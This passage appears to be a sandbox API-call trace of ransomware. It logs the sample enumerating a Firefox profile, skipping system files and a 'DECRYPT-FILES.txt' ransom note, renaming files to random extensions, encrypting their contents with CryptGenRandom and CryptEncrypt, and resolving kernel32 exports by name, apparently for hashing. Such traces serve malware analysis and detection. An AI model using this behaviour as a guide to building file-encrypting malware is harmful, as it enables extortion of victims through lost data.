returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 104 [0082.098] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.KfZlHV") returned 111 [0082.098] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.KfZlHV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.kfzlhv"), dwFlags=0x0) returned 1 [0082.098] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.098] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.099] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.099] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x84e029d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="DECRYPT-FILES.txt") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="autorun.inf") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="boot.ini") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="desktop.ini") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="iconcache.db") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="bootsect.bak") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat.log") returned 1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="thumbs.db") returned -1 [0082.099] lstrcmpiW (lpString1="sessionstore.js", lpString2="Bootfont.bin") returned 1 [0082.099] lstrlenW (lpString="sessionstore.js") returned 15 [0082.099] lstrcmpiW (lpString1="js", lpString2="lnk") returned -1 [0082.099] lstrcmpiW (lpString1="js", lpString2="exe") returned 1 [0082.099] lstrcmpiW (lpString1="js", lpString2="sys") returned -1 [0082.099] lstrcmpiW (lpString1="js", lpString2="dll") returned 1 [0082.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.099] lstrlenW (lpString="sessionstore.js") returned 15 [0082.099] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.100] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" [0082.100] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.101] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=3013) returned 1 [0082.101] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.101] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.101] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.101] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.102] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.102] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.102] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.102] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.103] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.103] CloseHandle (hObject=0x464) returned 1 [0082.103] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.103] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.104] CloseHandle (hObject=0x0) returned 0 [0082.104] CloseHandle (hObject=0x460) returned 1 [0082.104] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.104] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.104] GetTickCount () returned 0x114d00c [0082.104] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.105] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.105] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.105] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.105] lstrlenA (lpString="kernel32.dll") returned 12 [0082.105] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.105] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.105] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.106] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.106] lstrlenA (lpString="ADDATOMA") returned 8 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.106] lstrlenA (lpString="ADDATOMW") returned 8 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.106] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.106] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.106] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.106] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.106] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.106] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.106] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.106] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.106] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.106] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.106] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.106] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.106] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.106] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.106] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.106] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.107] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.107] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.107] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.107] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.107] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.107] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.107] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.107] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.107] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.107] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.107] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.107] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.107] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.107] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.107] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.107] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.107] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.107] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.107] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.108] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.108] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.108] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.108] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.108] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.108] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.108] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.108] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.108] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.108] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.108] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.108] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.108] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.108] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.108] lstrlenA (lpString="BEEP") returned 4 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.108] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.108] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.108] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.109] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.109] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.109] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.109] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.109] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.109] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.109] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.109] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.109] lstrlenA (lpString="CANCELIO") returned 8 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.109] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.109] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.109] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.109] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.109] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.109] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.109] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.109] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.109] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.110] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.110] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.110] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.110] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.110] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.110] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.110] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.110] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.110] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" 